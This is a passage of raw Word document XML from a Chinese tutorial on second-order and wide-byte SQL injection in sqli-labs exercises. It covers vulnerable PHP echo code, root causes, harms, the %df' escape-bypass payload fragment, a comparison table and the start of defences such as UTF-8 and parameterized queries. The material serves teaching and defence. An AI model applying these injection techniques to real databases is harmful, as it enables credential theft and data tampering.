                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t>echo "Username:".$row['username']."&lt;br/&gt;";</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t>echo "Password:".$row['password']."&lt;br/&gt;";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lastRenderedPageBreak/>
              <w:t xml:space="preserve">// </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>回显查询结果，方便我们获取注入数据</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3FA92834" w14:textId="77777777" w:rsidR="007220A3" w:rsidRDefault="003C05FE">
      <w:pPr>
        <w:spacing w:before="320" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="heading_26"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>四、成因分析</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
    </w:p>
    <w:p w14:paraId="75A75965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宽字节注入的漏洞成因核心是「字符集配置不当</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>转义逻辑缺陷」，具体分为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>点：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5215BB94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1.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>字符集选择不当：数据库、数据库连接未统一使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>UTF-8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>编码，而是使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>GBK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>等宽字节编码，为宽字节注入提供了编码基础。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F965746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2.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>转义函数使用不当：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>addslashes()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>等不安全的转义函数，该函数仅能转义特殊字符，无法适配宽字节编码的解析规则，导致转义符被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吞掉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。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7345312A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3.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>未正确设置数据库连接字符集：程序未通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>mysqli_set_charset()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>明确设置数据库连接字符集，导致前端输入与后端数据库的字符集解析不一致，转义逻辑失效。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53DB863A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4.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>动态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拼接：与二次注入一致，程序采用字符串拼接的方式构造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语句，未使用参数化查询，导致恶意字符逃逸后可篡改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执行逻辑。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4792A4" w14:textId="77777777" w:rsidR="007220A3" w:rsidRDefault="003C05FE">
      <w:pPr>
        <w:spacing w:before="320" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="heading_27"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>五、危害分析</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p w14:paraId="4578184E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宽字节注入的危害与二次注入完全一致，均属于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注入的范畴，危害程度取决于数据库用户权限和业务场景，具体如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D491BF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1.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>敏感数据泄露：可通过注入获取用户账号密码、个人信息、业务数据等核心敏感信息，如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>账号密码、用户手机号、订单信息等。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21DF01C1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2.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>越权访问：获取管理员账号后，可登录后台，执行添加、修改、删除数据等越权操作，破坏业务正常流程。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E8EA19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3.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>服务器沦陷：若数据库用户为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>权限，可通过注入执行写文件操作（如写入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>webshell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>），进而控制</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>服务器，执行恶意命令、窃取服务器数据。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A251476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4.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>据破坏：可执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>delete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/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>drop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/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>update</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>等高危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语句，删除数据库表、篡改业务数据（如修改订单金额、用户权限），造成重大业务损失。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F88D22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5.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>隐蔽性强：宽字节注入的</w:t>
      </w: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（如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>%df'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>）看似无明显恶意，且绕过转义的逻辑隐蔽，不易被安全检测工具发现，攻击成功率高。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A17B33F" w14:textId="77777777" w:rsidR="007220A3" w:rsidRDefault="003C05FE">
      <w:pPr>
        <w:spacing w:before="380" w:after="140" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="heading_28"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>第三部分：二次注入与宽字节注入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>核心对比</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29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60"/>
        <w:gridCol w:w="2760"/>
        <w:gridCol w:w="2760"/>
      </w:tblGrid>
      <w:tr w:rsidR="007220A3" w14:paraId="5236DDE5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14AE95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对比维度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742DCE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二次注入（第</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>关）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E31F80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宽字节注入（第</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>关）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007220A3" w14:paraId="134C5376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2A72EC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核心原理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80E9A7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首次入库转义，二次调用未校验，恶意</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>SQL</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>拼接</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>执行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382F13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lastRenderedPageBreak/>
              <w:t>利用</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>GBK</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>宽字节编码</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>“</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>吞掉</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>”</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>转义符</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>\</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>，单引号逃逸</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>闭合</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007220A3" w14:paraId="2C88E51B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97752E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lastRenderedPageBreak/>
              <w:t>触发条件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8FD55C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 xml:space="preserve">1. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>输入转义入库；</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">2. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>二次调用未校验；</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">3. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>动态</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>SQL</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>拼接（分两步触发）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648433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 xml:space="preserve">1. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>数据库连接为</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>GBK</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>；</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">2. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>使用</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>addslashes()</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>转义；</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">3. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>字符集不一致（单次请求触发）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007220A3" w14:paraId="37D3B8F4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593ACE8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依赖环境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BC8B9D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无编码要求，仅需逻辑漏洞（二次校验缺失）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569CEC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必须为</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>GBK</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>等宽字节编码环境</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007220A3" w14:paraId="68A076EF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CB3ECB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触发流程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96DDC2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注册（入库）</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">→ </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>找回密码（二次调用），分两步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921557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单次请求拼接</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Payload</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>，直接触发</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007220A3" w14:paraId="703B8766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65AF62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常见报错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18C421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无明显特定报错，多为</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>SQL</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>语法错误（因注释符使用不当）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FD12B2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单引号转义报错（</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>n</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>ear '\'users\'-- ' LIMIT 0,1'</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007220A3" w14:paraId="6A500FA3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5DE6BF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防御核心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1E53A9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二次校验</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>+</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>全程参数化查询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6A030B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统一</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>UTF-8</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>编码</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>+</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>参数化查询</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007220A3" w14:paraId="424E5787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B00055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危害程度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1BD9CC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高（隐蔽性强，分两步触发，不易被发现）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BBBC2C" w14:textId="77777777" w:rsidR="007220A3" w:rsidRDefault="003C05FE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高（</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Payload</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>隐蔽，绕过转义容易，攻击成功率高）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="06786F97" w14:textId="77777777" w:rsidR="007220A3" w:rsidRDefault="003C05FE">
      <w:pPr>
        <w:spacing w:before="380" w:after="140" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="heading_29"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>第四部分：通用防御方案</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
    </w:p>
    <w:p w14:paraId="28D1B06F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无论是二次注入还是宽字节注入，核心防御逻辑一致，重点从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编码、转义、查询方式、校验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四个维度入手，彻底阻断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注入：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4512F66B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1.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>统一字符集：数据库、数据库连接、前端页面、后端程序全部统一使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>UTF-8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>编码（推荐</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>utf8mb4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>），彻底消除宽字节注入的编码基础。</w:t>
      </w:r>
    </w:p>
